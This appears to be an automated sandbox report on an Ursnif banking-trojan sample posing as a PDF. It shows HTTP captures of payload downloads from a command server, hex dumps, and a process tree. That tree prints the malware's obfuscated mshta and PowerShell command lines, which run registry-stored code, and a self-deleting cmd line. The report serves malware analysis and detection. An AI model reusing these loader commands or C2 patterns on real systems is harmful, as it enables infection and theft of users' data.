3f 87 93 06 7c 29 ed 6a ba 6c 6a ff 37 9e 8d 30 81 6d e7 4e 8c 37 de f7 39 5f 8b 00 2f af 4d ea 56 2f 78 61 34 ce 07 d3 37 8b 51 99 02 dc 02 3f f4 31 de 2f 44 2f c5 e9
                      Data Ascii: Z\fZUtvj: @~cGfSFPf;i<N-JT$cx|c <j_~ecNnH#(R0E5q:Ukq7B:&QHU-s/:0x<L&@tu ?qt`y-R[wlKuo.F)nU4#W~M9u#'dQ"m}^V#CL~/J"|&wt%LXJ91xGNV}pcJS$?JX9JnJ["Xz3o`P$*)kv.'qd1$0lFXB1Vu`-=H>,!WEnaf+pOueE2+ JbwEVBk&OlS`O,P+spL6ZnY;$e|5h.cNlqQjx@w^H?&bq64|>z3$q=sk;!(q7n^?)n}+'/ %$?h$yq"RCOz-*=U h;GGb:+YPD<9t MiN6!)9;VtLaYpuN!<}N@t#bu\ieFW2/5$m}wP]h]-Gh]A2zzr[2dvLW:YMQazp|] #24=9J?|)jlj70mN79_/MV/xa47Q?1/D/
                      Apr 28, 2022 15:48:37.609595060 CEST1344OUTGET /drew/NiEEiC_2F3/2h7kr_2B2M1EBpHcH/ENyHLalFXmOl/_2FTW0ecUVe/3N7nldlK89kw4y/VYeID7sRLB3A_2FAgFg0G/a5El_2BO7WD36Nlp/el4uE7tHR4Z8M9p/QG4TJaEWODl3HaYCH4/kP01txLgC/1iGXgYXBwcTcIgoIP92G/0JSXT0rNb0xnVvZFyXY/gCk_2F7aTYUhOqcRrdrBn4/EZOQnHcHRUgv3/B5BfYkj9/KpyjZ64W8U3keBpCjw85kZ4/8t_2Bri7RNBUNE3Y/8jsFDn.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 94.140.115.8
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Apr 28, 2022 15:48:38.002393961 CEST1352INHTTP/1.1 200 OK
                      Server: nginx/1.14.2
                      Date: Thu, 28 Apr 2022 13:48:37 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 238744
                      Connection: keep-alive
                      Pragma: public
                      Accept-Ranges: bytes
                      Expires: 0
                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                      Content-Disposition: inline; filename="626a9b35e6741.bin"
                      Data Raw: 70 f4 cc a4 a7 b2 26 b8 47 5b c3 6f ba 9f ad f4 6d 09 c9 57 ca 26 0a 77 61 b4 3b a2 dc 3e 2d dc fd 52 b9 28 2b c3 ca b3 88 6b 09 50 34 4e d9 18 8a b3 b9 ea 6b 95 93 71 91 d0 67 6d da 30 3d 53 6b ad 1f b2 e4 21 61 9d 9c e8 01 f5 70 db a1 51 44 9d eb 06 74 37 e8 05 6e c4 e1 a8 80 15 fd ec 0e 03 b9 dc fa 2d 50 ee a3 6c 36 a5 49 32 9e 11 b1 03 6a f1 fd 61 b4 74 91 d3 39 cc 8a 37 0c f7 89 35 23 24 de 9c e5 f4 d0 53 67 76 5d ac 15 ba d7 f8 f7 17 47 af 20 21 18 84 71 2c 5e 58 a7 e5 54 70 ea 39 03 53 ec 37 54 63 29 79 4a 6b 98 5e df 82 31 70 9d f9 1e 0e e7 cb d9 d9 d6 44 5e b5 9b b0 0f a2 32 d3 24 de 19 f8 e6 3d 5c 70 ae d6 69 d8 ef 38 bf a9 45 b3 52 c4 f3 ad d1 72 10 f9 74 65 27 2f cf d9 d2 bf 06 a4 5c a8 67 ea 8e e9 cf 24 c0 9b c5 7f b0 fa b5 a3 f7 30 41 b6 ca ed c2 c7 ca ea 24 79 61 bc 3d 78 48 f6 55 e5 f2 1d 23 c7 5f 90 b0 50 64 f8 d4 0d e6 fe a3 fe 2e b4 05 f1 32 3e 84 f3 c5 fd ae ec 86 c7 d3 1d a0 ba a8 5d 08 54 69 80 4b 9e 82 1b 71 1f 32 75 a9 9b 9e e3 b1 a7 fa 45 22 0b 6e 03 37 5b 77 15 a8 c8 4a ae 08 d9 45 68 21 4b 27 cf ae 51 0e 2c 91 c7 7a b0 6b 32 16 59 ad 7c 06 7d be 87 77 0d d0 74 e3 01 69 49 e7 b2 bf 84 a2 fb a3 8e b5 67 93 36 21 63 89 14 83 44 74 60 ef ec d8 16 f6 d3 70 77 0f df 4f 09 3b b2 53 69 2a 32 c6 1f fa de 0d 26 ee f7 d2 54 64 fb 77 49 e2 a4 ca 2f 00 7d 94 1b 7d 93 96 63 02 99 55 cc ae 01 70 7d 40 46 e6 32 1b 9b 27 c7 33 85 3f 65 81 cb 20 23 2a 71 1a af 49 a6 07 49 3a 76 74 49 ae b1 2b 70 b1 83 02 59 72 a9 b0 6b 63 59 d6 9e 8d 07 9e 18 8b 6e 15 22 b0 a2 f6 d5 0c 9c 25 17 1e 55 b3 c5 b8 3f f2 4b 42 6e 6b 7b ec 7a 93 23 59 ae 71 57 ea 08 8d b3 47 d3 83 0d af 46 44 0c 89 06 1d 2b c5 b2 ed e7 9b 18 75 48 be e7 95 86 4d a9 f8 87 4a fe 74 0e 91 e1 bb 65 57 72 ec 1c ba 89 d0 f8 b7 db 3c e9 3e 12 68 53 8d 92 5f 43 38 d0 c3 bb f6 43 bc 18 04 34 95 3f a0 bb 80 98 cc 86 18 bf 26 33 44 c0 fd e4 04 74 73 81 ef 79 82 1b 1d 63 e1 12 94 64 48 8b fd 2e 1c ab ae 1e 25 46 96 33 57 55 98 f1 1b 26 1b 5e 9d 24 e2 52 83 df 1b 03 38 da fd dc 65 13 04 ee 6b 55 c4 9b b5 33 48 24 24 01 32 02 b0 f9 81 bf 43 11 4b 23 a9 54 40 87 82 f8 90 fe 49 58 95 6e b1 e5 b4 c2 15 3a 56 20 ee c6 de e5 7b f2 b1 47 ad 54 af ec bd 79 0b 72 4e 55 bc fc 33 9b db f9 f9 31 a5 fb cb 9e 93 e5 f4 c9 6b 53 e8 08 11 29 de 49 e0 b8 c2 2d c9 31 14 d6 88 30 af 91 61 cf 84 a3 65 4d a4 5f 29 83 a8 b1 86 5c 77 2b 4f 20 15 e5 ef 2b 55 81 0c ed ef 27 62 c7 59 80 7b 37 42 c8 db dc 61 ee 0b 37 6e 77 85 88 66 a5 1c 54 42 b1 29 83 ac af 1e 28 1e 25 f0 4e 09 d9 d6 44 2b 14 cf 64 17 d2 8f 61 26 36 e5 58 12 5f 42 12 54 8c 94 ba e0 1c a3 cc 79 fa 92 1a 85 80 f4 8f 14 f1 75 f3 2f 9e ed 86 0f 60 77 6b ce 41 2a e7 ed 06 b1 c2 19 eb 73 7f d0 1e d3 9e 34 89 ed f0 cd b6 6c 73 20 ed 09 90 b8 67 a1 bc ca 3b 1a b8 f3 73 01 01 9e 53 e5 cc 5c 95 cd 18 0b 87 e1 27 52 20 23 2f 08 fd cd 23 3d 55 41 95 b0 ad fe b4 f9 e3 a8 b0 71 6e ea 23 f2 b1 3e a6 e6 d9 f4 ab 2f cc f7 48 bc 42 cc 1c e2 87 f5 6f 13 a6 48 34 ff b8 64 5f ae 65 30 50 13 ec 22 34 58 69 d1 0e f6 80 92 36 f6 de 70 f7 9e 42 bd 59 04 89 3e 27 df c7 52 0f 10 05 2b 93
                      Data Ascii: p&G[omW&wa;>-R(+kP4Nkqgm0=Sk!apQDt7n-Pl6I2jat975#$Sgv]G !q,^XTp9S7Tc)yJk^1pD^2$=\pi8ERrte'/\g$0A$ya=xHU#_Pd.2>]TiKq2uE"n7[wJEh!K'Q,zk2Y|}wtiIg6!cDt`pwO;Si*2&TdwI/}}cUp}@F2'3?e #*qII:vtI+pYrkcYn"%U?KBnk{z#YqWGFD+uHMJteWr<>hS_C8C4?&3DtsycdH.%F3WU&^$R8ekU3H$$2CK#T@IXn:V {GTyrNU31kS)I-10aeM_)\w+O +U'bY{7Ba7nwfTB)(%ND+da&6X_BTyu/`wkA*s4ls g;sS\'R #/#=UAqn#>/HBoH4d_e0P"4Xi6pBY>'R+
                      Apr 28, 2022 15:48:38.721512079 CEST1606OUTGET /drew/lAbS1TW8Ry8K_2Fy_2F02/IsWfDHUCh87tGSw4/6lgCxLe1Qs4WPGx/DknDiIGwAkcSSAjTq_/2BfvJx7dx/1hlTGDAg0PRAb8RWrNXa/OnwJqcZ0UkVEA4nNNEX/rU_2BEpbIQ3L_2FTXhvUWT/8ZfWEtxix63AY/iFey05B2/gKLIqEyGvdF_2FQqfOcIngQ/d4nr47OKVK/s16bIA5z3PH2z3706/OF3C_2BAmDzq/p9S3fF0IaVA/8GI4MffuRsVQDp/0oN_2BdvJJV7wESzGZsla/_2FLi.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 94.140.115.8
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Apr 28, 2022 15:48:39.140155077 CEST1607INHTTP/1.1 200 OK
                      Server: nginx/1.14.2
                      Date: Thu, 28 Apr 2022 13:48:39 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 1865
                      Connection: keep-alive
                      Pragma: public
                      Accept-Ranges: bytes
                      Expires: 0
                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                      Content-Disposition: inline; filename="626a9b3710e01.bin"
                      Data Raw: 13 c8 48 02 7e 92 9b 44 9c 80 e3 6e 2a f8 f3 75 79 58 37 d9 61 c6 1b e4 d8 93 7d 37 75 01 12 d2 d0 2b 2f 69 5d ac 0d 29 e1 ed 10 b5 cc ea 27 9f ad 49 81 4e 50 ac 8e da db 88 93 13 bd ea a0 ec 3a c4 3a 5b ef b7 d0 7f 06 cc 90 ad 9b e9 95 fa 32 b7 86 e9 8c 81 89 a6 d6 ba b9 9a c2 3c 39 70 b2 23 b3 5a b8 27 98 32 fe 60 3b 8c ad a1 c0 68 98 99 41 b6 e0 0b 1b bb 99 3b 8f b1 77 50 75 d9 fb b6 0d 7e e6 78 02 36 bf f9 4b e5 d9 7e b7 8f 03 ed 31 a3 a0 dd 16 d3 d3 f1 bd b1 11 8e 79 1a b6 14 10 d4 33 de 12 80 68 4e e5 8d 21 73 47 45 58 98 ba 2f ea bb d0 df 50 d3 4f de 07 ba dd 02 ca 88 47 9e b5 32 3f 2c 9d 03 8e 52 93 26 2f f6 92 ad 4e bf a1 80 42 37 3f d2 48 0b fb 88 54 e8 12 ed de 44 ee 93 07 f1 bc 5a 5f a3 f5 49 94 dc 1d 82 bf 3f d3 7e e1 d7 76 1c 3b b8 f1 06 b5 fe 86 c1 aa b9 65 bf f7 0e 75 3d e5 ef b2 c8 ee f3 b1 3a 50 b6 be 3e aa 47 82 8c cc b2 22 fb 1b 03 33 6d 86 a3 c8 3c b7 38 0c db 03 96 2b 3f 45 85 3e fc 1d 8e 9f 93 bb 52 dd 88 95 a3 e0 f6 33 5e a8 1c 24 46 36 9c a6 73 40 3d 18 6c a5 08 c5 af 02 57 15 e4 80 67 47 df e9 71 c1 14 6f 02 a7 80 8b c8 6e d2 e0 57 d4 7c c1 3a b7 99 9d db 11 c3 47 2a 12 77 cf d9 5b 06 b5 f9 bd 01 2f ec 21 db a8 ce 75 f5 3a 04 5e 14 b6 51 27 8f 16 49 94 da 77 1d bd cd 5e 4a 4b 7d d1 e3 f4 3f 5c 1a 33 7e 91 5f 94 c0 41 07 68 9d cd 6b 72 e4 34 18 1c f3 72 6e a1 d4 b9 1c 49 84 6c 47 11 f3 57 f0 54 32 2e 0b 32 96 ed 10 ae 5b fa 0d 16 80 3d 6a bb d3 d2 82 2c 91 c4 0a 2e 48 32 f6 04 a4 94 d8 ba d6 89 b4 5b 09 d5 6b 54 11 8b 98 73 26 24 d1 68 bc 3c 20 27 6c 5b a7 b2 63 47 4a d8 6e e2 04 da 17 97 b0 18 45 db da 03 19 16 c7 62 30 10 c4 db c2 36 68 bc 0b 32 e3 62 33 04 59 93 ca 45 8d cc 6b c0 b3 74 59 f4 b3 aa 69 25 00 99 62 4a e6 72 12 59 26 0e 89 0a 46 38 77 84 d7 88 ee 0a a2 30 c6 13 91 f1 9e 97 39 a0 f9 c5 6f a7 f6 f9 37 d6 82 09 48 ec fe 48 99 47 76 55 ff 87 fe 03 2d 24 ec f8 ef 59 35 71 40 63 5a 0f c0 08 c0 8b f7 2e a4 db ed ff 91 8e 4d a9 4b 2c cc 12 ad ca dc 93 7a b3 43 11 23 9d 51 b0 bc 04 7a 86 43 7c be 41 f3 ec 95 d3 8d 10 44 9e ef 4f d1 3f 39 52 bb fd ba 1f 85 d1 f5 10 0b f2 cc e3 34 80 b6 b1 d3 b2 32 79 5a 61 ee b3 db 2d 78 90 06 dd 27 09 6d 1a a9 d7 3b 68 06 2b 51 e8 37 64 6f 76 ab 6b 22 bc 5e 6a 23 99 a3 ff 69 96 ba 18 c4 de 8a 4e a4 44 d5 ce 2e 9d 1b 7b 65 84 e1 e6 8d 03 cb 97 bf 64 a4 2d e2 b2 5e 29 45 2f ef 7c 73 73 91 74 fa 22 a2 ef 15 d8 6e 6e 09 d8 2b 09 34 b4 3c 40 20 94 ee fc fc bf 6c 46 77 69 94 c4 c1 a8 87 f6 3e da 26 96 ff 17 f5 8e a9 39 46 eb d5 c5 b8 b1 ba e9 cb 87 cd 47 49 dd e2 0a ac 88 65 a5 6e e1 ca 3b 35 f9 fb 96 f3 0a ba 02 ab 15 78 ed 40 43 75 df f0 82 f3 db 02 6e 23 5f 8d de 35 c7 c4 68 86 8a 5f 86 fe f1 6b e8 d0 b9 e7 50 4a 3e 35 3e a4 83 e3 9b 59 9e d0 cf 15 9a a4 1d 3c b7 a0 26 bf 82 c4 85 7c 6c 80 8d 0e 28 71 35 ab 2d 6b 0e ec 33 f4 86 8a 57 14 62 be 9f 01 e5 4a 67 75 58 c5 47 1b 0c 8c 41 ac 32 92 39 77 2a ee 89 69 b9 48 1e e1 84 ca 23 7a 77 5d 43 ad c0 b0 41 93 aa 01 84 86 54 fc 2f 43 a4 79 9a 69 b6 f1 33 3a a0 c0 7e 7f e0 68 38 c5 24 cb 33 4f c7 3f 42 b6 32 74 86 68 aa f9 98 9e 9e 44 e4 84 d9 e4 93 32 51 f2
                      Data Ascii: H~Dn*uyX7a}7u+/i])'INP::[2<9p#Z'2`;hA;wPu~x6K~1y3hN!sGEX/POG2?,R&/NB7?HTDZ_I?~v;eu=:P>G"3m<8+?E>R3^$F6s@=lWgGqonW|:G*w[/!u:^Q'Iw^JK}?\3~_Ahkr4rnIlGWT2.2[=j,.H2[kTs&$h< 'l[cGJnEb06h2b3YEktYi%bJrY&F8w09o7HHGvU-$Y5q@cZ.MK,zC#QzC|ADO?9R42yZa-x'm;h+Q7dovk"^j#iND.{ed-^)E/|sst"nn+4<@ lFwi>&9FGIen;5x@Cun#_5h_kPJ>5>Y<&|l(q5-k3WbJguXGA29w*iH#zw]CAT/Cyi3:~h8$3O?B2thD2Q


                      Statistics

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:15:47:43
                      Start date:28/04/2022
                      Path:C:\Windows\System32\loaddll32.exe
                      Wow64 process (32bit):true
                      Commandline:loaddll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll"
                      Imagebase:0xed0000
                      File size:116736 bytes
                      MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:2
                      Start time:15:47:43
                      Start date:28/04/2022
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1
                      Imagebase:0xed0000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:4
                      Start time:15:47:44
                      Start date:28/04/2022
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1
                      Imagebase:0xf10000
                      File size:61952 bytes
                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.424373972.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.424240322.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.530255853.0000000005CA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.475301685.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.424606218.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.601015727.0000000004B4F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.472906954.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.424163423.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.424658030.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.599055996.00000000048E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.424644302.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.424536633.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.476686328.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.599465657.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.475223060.0000000004DCA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.475254135.0000000004E49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.424457867.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:high

                      General

                      Target ID:17
                      Start time:15:48:42
                      Start date:28/04/2022
                      Path:C:\Windows\System32\mshta.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dgvy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dgvy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Imagebase:0x7ff74c6b0000
                      File size:14848 bytes
                      MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:18
                      Start time:15:48:46
                      Start date:28/04/2022
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Imagebase:0x7ff620040000
                      File size:447488 bytes
                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.571518194.00000182D98EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:high

                      General

                      Target ID:19
                      Start time:15:48:46
                      Start date:28/04/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6406f0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:20
                      Start time:15:49:00
                      Start date:28/04/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.cmdline
                      Imagebase:0x7ff61dca0000
                      File size:2739304 bytes
                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:moderate

                      General

                      Target ID:22
                      Start time:15:49:03
                      Start date:28/04/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4ECA.tmp" "c:\Users\user\AppData\Local\Temp\pyir2nwc\CSC3492E89F885A4D28ABE1C8363667B7D.TMP"
                      Imagebase:0x7ff6c2e40000
                      File size:47280 bytes
                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Target ID:23
                      Start time:15:49:04
                      Start date:28/04/2022
                      Path:C:\Windows\System32\control.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\control.exe -h
                      Imagebase:0x7ff772ce0000
                      File size:117760 bytes
                      MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.545160730.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.545084241.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000017.00000000.543939686.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000017.00000000.542346452.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000017.00000000.544562349.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate

                      General

                      Target ID:24
                      Start time:15:49:08
                      Start date:28/04/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.cmdline
                      Imagebase:0x7ff61dca0000
                      File size:2739304 bytes
                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:moderate

                      General

                      Target ID:26
                      Start time:15:49:10
                      Start date:28/04/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6B2B.tmp" "c:\Users\user\AppData\Local\Temp\vx43imot\CSCE0D7D73128344F6AB96E56EC2E032.TMP"
                      Imagebase:0x7ff6c2e40000
                      File size:47280 bytes
                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:27
                      Start time:15:49:16
                      Start date:28/04/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff77c400000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:29
                      Start time:15:49:30
                      Start date:28/04/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a97fea05c8.pdf.dll
                      Imagebase:0x7ff6edbd0000
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:30
                      Start time:15:49:32
                      Start date:28/04/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6406f0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:31
                      Start time:15:49:35
                      Start date:28/04/2022
                      Path:C:\Windows\System32\PING.EXE
                      Wow64 process (32bit):false
                      Commandline:ping localhost -n 5
                      Imagebase:0x7ff66d420000
                      File size:21504 bytes
                      MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:32
                      Start time:15:50:08
                      Start date:28/04/2022
                      Path:C:\Windows\System32\RuntimeBroker.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                      Imagebase:0x7ff61beb0000
                      File size:99272 bytes
                      MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Disassembly

                      No disassembly